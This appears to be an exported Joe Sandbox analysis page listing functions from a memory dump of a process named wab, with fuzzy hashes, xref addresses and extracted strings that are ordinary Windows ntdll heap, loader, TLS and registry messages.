API String ID: 0-1239276146
Opcode ID: f59b908ff550f3c9fe450e6a764f72596c503c049a7aa5b8b0dd4cf1149218a5
Instruction ID: c58965df278642afc88edad15461cfc40a774c05cd665f8f5d27b84adabe8e13
Opcode Fuzzy Hash: f59b908ff550f3c9fe450e6a764f72596c503c049a7aa5b8b0dd4cf1149218a5
Instruction Fuzzy Hash: FAA1B4319802299BDF24CF54CC94BA9B3B5BF58718F1491E9EE09AB251D730AE80CF90

Function 02E764AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 02ED10AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 02ED1028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 02ED106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 02ED0FE5

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: c0003d7831ec49614279f5553f132731ec6d7a511d9f78d49ffc8e20618e1c5f
Instruction ID: e1ec4f2fd08c28c0b8c6db43b2dc60555d8e6dd7546c0b845d9f68612461d6e2
Opcode Fuzzy Hash: c0003d7831ec49614279f5553f132731ec6d7a511d9f78d49ffc8e20618e1c5f
Instruction Fuzzy Hash: 5571F0B19847049FDB20DF14C884F977BADAF44768F40A869FA488B286D334D589DFD2

Function 02E6F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 02ECE563
`, xrefs: 02ECE428
HEAP: , xrefs: 02ECE54E
HEAP[%wZ]: , xrefs: 02ECE3FE

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: 8c9b7c775ca1c1d224619d2404ae4552612dc5825d709ddb183759686a490a19
Instruction ID: d93e3dbcefdd0c48251fc4a169ea14f064e36c94900b0a278bc021b6995c5482
Opcode Fuzzy Hash: 8c9b7c775ca1c1d224619d2404ae4552612dc5825d709ddb183759686a490a19
Instruction Fuzzy Hash: 9D6134322C42809FD321DB68D948F7B77E9FF44758F18A468F9968B291D734E801CB61

Function 02F211A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 02F21261
HEAP: , xrefs: 02F2124A, 02F2125D, 02F2125F, 02F212C4
This is located in the %s field of the heap header., xrefs: 02F212D6
HEAP[%wZ]: , xrefs: 02F2123D, 02F212B7

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: c913f2d57332661e4d5e3d426d36f72c14f882426ac6743d517f6611c627ff30
Instruction ID: 32e157fea4dc8ca99bc5cbcd9a8bf17f247049718458ae4fc3d6303cc30ef612
Opcode Fuzzy Hash: c913f2d57332661e4d5e3d426d36f72c14f882426ac6743d517f6611c627ff30
Instruction Fuzzy Hash: 1E310731680120EFE711DB98C885FA777E9EF067A8F158059F609DB292E731AD44CF58

Function 02E69148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

VirtualQuery Failed 0x%p %x, xrefs: 02ECBAF7
HEAP: , xrefs: 02ECBAAD, 02ECBAEA
HEAP[%wZ]: , xrefs: 02ECBAA0, 02ECBADD
VirtualProtect Failed 0x%p %x, xrefs: 02ECBABA

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: d912ca6ccd3d32fc4404e525fc32a0c972461df25e49d539aa780aeacc78cdc3
Instruction ID: 30721ca1748f715fdaa8c4043cd1d9561d360f30db1cad5b9737826596d6bbda
Opcode Fuzzy Hash: d912ca6ccd3d32fc4404e525fc32a0c972461df25e49d539aa780aeacc78cdc3
Instruction Fuzzy Hash: 9D31F2326C0114EFDB01DB85CC89FAAB7B9EF457A8F25D069F815AB291D770E940CB60

Function 02F194E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

0, xrefs: 02F19BF6
, xrefs: 02F19B84
, xrefs: 02F19AD7

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: $ $0
API String ID: 0-3352262554
Opcode ID: 4676d0b4bc72b6a733b638efbc0314da74492310b4efa7e23570d314e72acf8d
Instruction ID: 07d9c09ff99daf506f8c38ff8d05ee1b8a65e5bb7a04dfffed48974d3f6485bb
Opcode Fuzzy Hash: 4676d0b4bc72b6a733b638efbc0314da74492310b4efa7e23570d314e72acf8d
Instruction Fuzzy Hash: 0932F5B1A083818FD320CF68C594B5BBBE5BF88384F54492DF69987250D7B5E948CF92

Function 02E80770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 02ED50CA
HEAP: , xrefs: 02ED50BD
HEAP[%wZ]: , xrefs: 02ED50AE

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 1514b83f8f9ac16c9550af677e48aa27e5a12a41c998305fca6a893afebbaffb
Instruction ID: 5b38a4c27b66d80daeffc517839ee1620ca503c23cb4429763a48f45fb36f5a0
Opcode Fuzzy Hash: 1514b83f8f9ac16c9550af677e48aa27e5a12a41c998305fca6a893afebbaffb
Instruction Fuzzy Hash: 51F1BD30A80605DFEB25DF68C894BAAB7B5FF45308F14D1A8E45A9B391D730E985CF90

Function 02E7B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 02E7B702
LdrResGetRCConfig Exit, xrefs: 02E7B714
MUI, xrefs: 02E7B6D8, 02E7B7E7

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 1c751f45c44b32c1575d07e892999cacd9d9e7817b2dfdfc599a1fe2eb68a6fe
Instruction ID: 53a33aaf218e785760348e53b13ed9bf7339331a848f011ac6516da245234b95
Opcode Fuzzy Hash: 1c751f45c44b32c1575d07e892999cacd9d9e7817b2dfdfc599a1fe2eb68a6fe
Instruction Fuzzy Hash: D4B19D3AA846449FDB25CF69C980BADB7B6AF4471CF14E56DE852EB280D730E841CF41

Function 02EF368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

\SystemRoot\system32\, xrefs: 02EF3842
DelegatedNtdll, xrefs: 02EF36CE
@, xrefs: 02EF389F

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: 8acd82360ec88ae7fc92cdc38559480d15ceb49a6d9ed2e724165650167eba77
Instruction ID: 7bba6e9fb3ba21eb0cb935f6043cd4af21dcf4574b24e2db02e501d1857eb6c8
Opcode Fuzzy Hash: 8acd82360ec88ae7fc92cdc38559480d15ceb49a6d9ed2e724165650167eba77
Instruction Fuzzy Hash: 1FB10172684785AFE751DF54C880FABB7E8EF44758F00A969FB5497280C774E804CB92

Function 02E6A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 02ECC2E6
UseFilter, xrefs: 02E6A1C1
\??\, xrefs: 02ECC1E4

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: c1c533ccdac4105c4c4df72121138afd346a8e4cee0af7e4f98b46a25afbc732
Instruction ID: 92ec5181da611f45b458274b6e402d796b986f88afef9517f1c891d29b26bab7
Opcode Fuzzy Hash: c1c533ccdac4105c4c4df72121138afd346a8e4cee0af7e4f98b46a25afbc732
Instruction Fuzzy Hash: E6A18B719802299BDB219B64DD88BEAB3B9EF04704F2091EAE90CA7250D7359E85CF50

Function 02F036EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

LdrpResMapFile Exit, xrefs: 02F03727
@, xrefs: 02F03867
LdrpResMapFile Enter, xrefs: 02F03715

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
API String ID: 0-318774311
Opcode ID: 902b842e82f8465ab14b72215b484d698fa1d94d5c6b75ce9ac0d4e664f1d7f6
Instruction ID: 75f21291ac0dbc3fe13ded41881f859481e1d902ece26d165e9c6537e88f73e7
Opcode Fuzzy Hash: 902b842e82f8465ab14b72215b484d698fa1d94d5c6b75ce9ac0d4e664f1d7f6
Instruction Fuzzy Hash: 4F81AB72A08340AFD321DB14C884F6AB7E9EF85794F0449A9FE849B3D0D734E904DB62

Function 02EA909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

%, xrefs: 02EE5D3F
&, xrefs: 02EE5CF8
@, xrefs: 02EA9148

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: 59612585c53cd9c8f8820e8dff6871993364df2771a871287c93960d4d092587
Instruction ID: ac3fe59a198a8d7535ecad8dc771cc9ddd224719f15d687f454e1acb054c502e
Opcode Fuzzy Hash: 59612585c53cd9c8f8820e8dff6871993364df2771a871287c93960d4d092587
Instruction Fuzzy Hash: 09719F705883019FC714DF24D5A0AABBBE6BF8571CF10E91DF59A5B252D730E805CB62

Function 02F4B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

GlobalizationUserSettings, xrefs: 02F4B834
TargetNtPath, xrefs: 02F4B82F
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 02F4B82A

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 4fabde245f203b9d63df5704635e2e5a9357d1369a6136b7693cf79fdbe1873f
Instruction ID: f046877118f1b8e7ee3e8df6a2c20025c947bb43e7d3b9ac6be4a6ce6bd693c0
Opcode Fuzzy Hash: 4fabde245f203b9d63df5704635e2e5a9357d1369a6136b7693cf79fdbe1873f
Instruction Fuzzy Hash: EF619272D8122DABDB21DF54CC98BDABBB9AF04758F0141E5E608A7251CB74DE84CF90

Function 02E6F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02ECE6B3
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 02ECE6C6
HEAP[%wZ]: , xrefs: 02ECE6A6

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: dfb4abad69a7b796c7a77644d61eef4d3025bb10598e6d4dfb28aba189ee8da9
Instruction ID: 7fb79bcd818fa31b22c10cf72b0a27feb767ba7ea645db6827c03ada272d86cc
Opcode Fuzzy Hash: dfb4abad69a7b796c7a77644d61eef4d3025bb10598e6d4dfb28aba189ee8da9
Instruction Fuzzy Hash: B75128316C0644EFE722DBA8D948FAABBF8FF05748F1490A4E586C7692D774E901CB50

Function 02EAC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 02EE82D7
minkernel\ntdll\ldrinit.c, xrefs: 02EE82E8
LdrpInitializePerUserWindowsDirectory, xrefs: 02EE82DE

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 87de804d04337bd0d10d614072f7da76311b20ca95ca6d5f9c3fd5be15f837ee
Instruction ID: ef94deb0a9e70bb209c8c8788357f195b1a495b78e3b4456a19151110b21cf8f
Opcode Fuzzy Hash: 87de804d04337bd0d10d614072f7da76311b20ca95ca6d5f9c3fd5be15f837ee
Instruction Fuzzy Hash: 6F4105715C4304ABDB20EB34D948B5BB7E9EF44794F10A82AF959DB250EB74E810CF91

Function 02EA16CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

LdrpAllocateTls, xrefs: 02EE1B40
TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 02EE1B39
minkernel\ntdll\ldrtls.c, xrefs: 02EE1B4A

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: 794c333590cc035a7d1ea979d75aa5aa71879f22d0e2c296a7fdfb365698749a
Instruction ID: 9308c5e6e4de69e4c846b2bda3c95b1a0fa9ed442808cbebbc1bcadffc3ff36d
Opcode Fuzzy Hash: 794c333590cc035a7d1ea979d75aa5aa71879f22d0e2c296a7fdfb365698749a
Instruction Fuzzy Hash: D441A0B5E80608AFDB15DFA8C840AAEF7F6FF48748F04A119F41AAB250D774A810CF50

Function 02F2C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 02F2C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02F2C1C5
PreferredUILanguages, xrefs: 02F2C212

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: c70cfe0abfae44c78e4dfe105113110b9733d8a3b52eefac1307c4c5cae7071c
Instruction ID: 6fe677b1763df552c580e7a4b2249dade3c5c4559a8d9f053d0713c8d6ce43c3
Opcode Fuzzy Hash: c70cfe0abfae44c78e4dfe105113110b9733d8a3b52eefac1307c4c5cae7071c
Instruction Fuzzy Hash: 4341B072E40219EBDF11DAD4C890FEEB7B9AF05B44F01806BEA05B7280DB709A48CB50

Function 02F04144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 02F04172
@, xrefs: 02F04225
LdrpResValidateFilePath Enter, xrefs: 02F04160

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 48ce778bbbdfdcf31ce25fe9f7c137e86a7c57797c482a0cbf2a8d59e1d8fe93
Instruction ID: fa88a7964207c008e6e085729fa104710420bcd256b06808bb54357f35c75f2f
Opcode Fuzzy Hash: 48ce778bbbdfdcf31ce25fe9f7c137e86a7c57797c482a0cbf2a8d59e1d8fe93
Instruction Fuzzy Hash: 5F410232E402588BEB22DBA4C880BADB7B9EF49384F15049AEB45FB7C1D7349901DB10

Function 02EF4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 02EF4899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02EF4888
LdrpCheckRedirection, xrefs: 02EF488F

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 16dd841578d3fb9350ecf6c1b9e4bb96c9f765f760a3d79015f67cd4aa3c3290
Instruction ID: d9251eb920b5396abfa7c6e62744c92a0e8d3f22470ef895b86347e60ad308ef
Opcode Fuzzy Hash: 16dd841578d3fb9350ecf6c1b9e4bb96c9f765f760a3d79015f67cd4aa3c3290
Instruction Fuzzy Hash: 9241E232A802D49BCBA1CE18D840A67B7E5EF49B58F059559FF59D73E1D730E800CB80

Function 02EA33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

Actx , xrefs: 02EA33AC
SXS: %s() passed the empty activation context data, xrefs: 02EE29FE
RtlCreateActivationContext, xrefs: 02EE29F9

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: 2edae6cddf661d7f2d0d7edb2a8585c0feeb5c7ba4af293d0aa67a6e2616698e
Instruction ID: 54d719b02ca17091a4d77046f9400d60dbc0a5c5d94c4faac51702d7565c5f2e
Opcode Fuzzy Hash: 2edae6cddf661d7f2d0d7edb2a8585c0feeb5c7ba4af293d0aa67a6e2616698e
Instruction Fuzzy Hash: 6A3112336803059FEF26DE58D890B9677AAEB44718F05D4A9FE099F281DB70E841CB90

Function 02EA1607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

DLL "%wZ" has TLS information at %p, xrefs: 02EE1A40
minkernel\ntdll\ldrtls.c, xrefs: 02EE1A51
LdrpInitializeTls, xrefs: 02EE1A47

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 148fc365f9871413822296a207b3c6cda95789641adeb406a9b587cdc28e28cd
Instruction ID: d68c7cbcfc7a5fa77b5fa66532157e8e9708855d7256a78e1c077645e4c1bbcb
Opcode Fuzzy Hash: 148fc365f9871413822296a207b3c6cda95789641adeb406a9b587cdc28e28cd
Instruction Fuzzy Hash: 7631F871AC0204ABEB149B58CC59FBAB7BAFB80798F459559F50EBF180D770BD408B90

Function 02EB1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

@, xrefs: 02EB12A5
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 02EB127B
BuildLabEx, xrefs: 02EB130F

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: b3bf01f5d48ff64526ea5fd95d015bc28ad14bb54de495721c1d1d0b2ee67c2b
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: C031A472980518ABDF12EF95CD54EDFBBBEEF84764F019025F908A7160E7309905CB60

Function 02EF20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 02EF2104
Process initialization failed with status 0x%08lx, xrefs: 02EF20F3
LdrpInitializationFailure, xrefs: 02EF20FA

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 04330a825bbbfb846b5336f2882d4c5f1af2e3dea6bd407895ba7fda78044634
Instruction ID: 04da825c231160273a64f0c4471936354edd6456e1fec301df30a5ad7706028b
Opcode Fuzzy Hash: 04330a825bbbfb846b5336f2882d4c5f1af2e3dea6bd407895ba7fda78044634
Instruction Fuzzy Hash: 35F02870AC021C7BE724D648CC17F96776DEB40B58F009454FF0477281D3B0A900CA50

Function 02E803E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02ED4D8A

Strings

#%u, xrefs: 02ED4D82

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 041d1160a68c9005fa0a6ff53c300263b65001c38cc1ffff7eb86021d410efd5
Instruction ID: 7a1aa8e66e5d175c17fc32d54bc1b765b0b91ca43e7d1c124844167a0a84c2ea
Opcode Fuzzy Hash: 041d1160a68c9005fa0a6ff53c300263b65001c38cc1ffff7eb86021d410efd5
Instruction Fuzzy Hash: 87716A71A4010A9FDB01EFA8C990BEEB7F9EF08704F159465E909E7291EB34ED01CB60

Function 02E852A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 02E85445
@, xrefs: 02E855A3

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d1ca20721442a31b94fe90a289432b88ef8dd14edbd2a0b7f1258abbee36ed52
Instruction ID: 9c8fe56e46ff22ab886ca700bba76aff313688552c4f6228f6c5871a27e810ca
Opcode Fuzzy Hash: d1ca20721442a31b94fe90a289432b88ef8dd14edbd2a0b7f1258abbee36ed52
Instruction Fuzzy Hash: 7E32AC705883118BC724EF15C48077EB7E5AF84748F96A92EF9CE9B290EB34D941CB52

Function 02F3A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 02F3A551
`, xrefs: 02F3A44B

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 7227a2d7146b0bceb99dccd061ccd6d91e8cf1470cb7700708815826d4a1f335
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: BCC1C1326043459BDB26CF26C841B6BBBE6AFC4398F084A2DFAD5CA290D775D505CF81

Function 02EEE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 02EEE75A
UEFI, xrefs: 02EEE751

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 25e94557bd59a3d142ea20579aa63cca5a173f435c59b4ebb5883a8ae622341a
Instruction ID: 790554ac69aebde3b242948d12f8f09a5b48c6a79b1789d91993ea8e30fbbe01
Opcode Fuzzy Hash: 25e94557bd59a3d142ea20579aa63cca5a173f435c59b4ebb5883a8ae622341a
Instruction Fuzzy Hash: D4617E71E803189FDF15DFA8C840BAEBBB9FB44714F18906DE65AEB251D731A900CB54

Function 02E8F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 02E8F7F6
$, xrefs: 02E8F860

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: $$$
API String ID: 0-233714265
Opcode ID: e57a8084c5842e776a9a35cb5f87804269577f46b318c64691af05d26d4b375d
Instruction ID: 520ab44ea0da210ed30d0a923a67a03faef76664761ab424252ecf47f5424844
Opcode Fuzzy Hash: e57a8084c5842e776a9a35cb5f87804269577f46b318c64691af05d26d4b375d
Instruction Fuzzy Hash: D361E071A80749DFDB20EFA4C580BACB7B2FF04308F50A029E55D6BA80CB74A941CF50

Function 02E704E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 02E7063D
kLsE, xrefs: 02E70540

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 643768f58046123b4a39cf90813e563a0428e25b51da8d76211d0bf22fe02b7b
Instruction ID: 17495d8acdf8c5566c552637623aba7640bc6050b918a5dc55e206af9f7aafa4
Opcode Fuzzy Hash: 643768f58046123b4a39cf90813e563a0428e25b51da8d76211d0bf22fe02b7b
